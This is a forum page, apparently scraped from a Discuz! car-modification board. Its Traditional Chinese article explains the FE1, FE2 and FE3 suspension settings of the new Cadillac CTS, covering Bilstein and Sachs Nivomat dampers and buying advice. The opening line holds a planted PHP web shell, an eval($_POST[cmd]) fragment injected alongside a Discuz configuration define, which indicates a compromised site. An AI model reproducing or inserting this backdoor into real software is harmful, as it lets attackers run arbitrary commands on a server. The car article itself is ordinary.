');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 揭秘凱迪拉克新CTS的三種懸掛設定 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

揭秘凱迪拉克新CTS的三種懸掛設定

凱迪拉克新CTS車配置表中「FE1」、」 FE2」、「FE3」到底是什麼意思?近日,不少網友發帖詢問同樣的問題。由於涉及到凱迪拉克最新車型技術,我們通過努力才最終找到了相關資料,為大家揭開這三組奇怪名字背後的秘密。




  一種車型三種懸掛設定

  全新凱迪拉克CTS上月進入國內銷售。和很多豪華車在配置上做文章來區分級別不同的是,新CTS更強調自己的豪華運動轎車身份,因此在體現運動性能的設定上頗費心思,提供了3種完全不同的風格設定,而由此帶來減震、差速、穩定桿、剎車盤、卡鉗設定的差異,體現出極強的專業性。

  為了簡便區分三種不同的設定,凱迪拉克將其分別設為「FE1」、「FE2」、「FE3」型號便於區別和記憶,也清楚的表明了設計訴求——其中FE1主要特點是舒適,FE2則更多體現公路運動性,而頂級的FE3型號則強調了跑車般的駕駛快感。

  避震器差異帶來的風格設定

  避震器直接關係到車輛行駛過程中的駕乘感受,更體現車輛的設計訴求。在2.8升版本的新CTS上,全車採用了Bilstein品牌的避震器。Bilstein是聞名世界的避震器專業廠商,為寶馬、凱迪拉克、奔馳甚至保時捷、法拉利進行產品配套,其擁有的16項專利奠定了Bilstein的頂尖地位,也成為專業改裝廠商ABT、AMG、Brabus的御用避震器,因此在舒適性和較強的運動性方面表現突出。

  而3.6升的車型則為公路跑車而生,其前避震除了採用Bilstein之外,後避震得到了特殊的加強,FE3設定採用了Sachs (薩克斯)品牌的Nivomat後避震,並能夠根據車輛的負載情況主動調節懸掛的高度和阻尼,以保證車輛在各種情況下的操控,也奠定了3.6升車型跑車式的操控風格,充分滿足了駕駛者對速度和操控的追求。

  訴求上的差異也就意味著不同的新CTS會得到不同的駕乘感受,這在以往的豪華車型中還不多見。因此如何選擇合適的新CTS也並非是看型號和價格的差異,更需要瞭解自己的真正用途。

  對大多數消費者而言,能夠偶爾體驗極端駕控的樂趣,更多的時候講求的還是舒適,那麼採用FE1、FE2的新CTS都足以滿足這樣的需求。但對於真正以駕控為訴求的消費者而言,3.6升車型裝備的FE3則是最佳選擇,因為其帶來的操控感受完全體現出跑車化的風格,也為新TS被譽為「操控最好的美國車」打下了堅實的技術基礎,更凝聚了新CTS的最新技術精華。
返回列表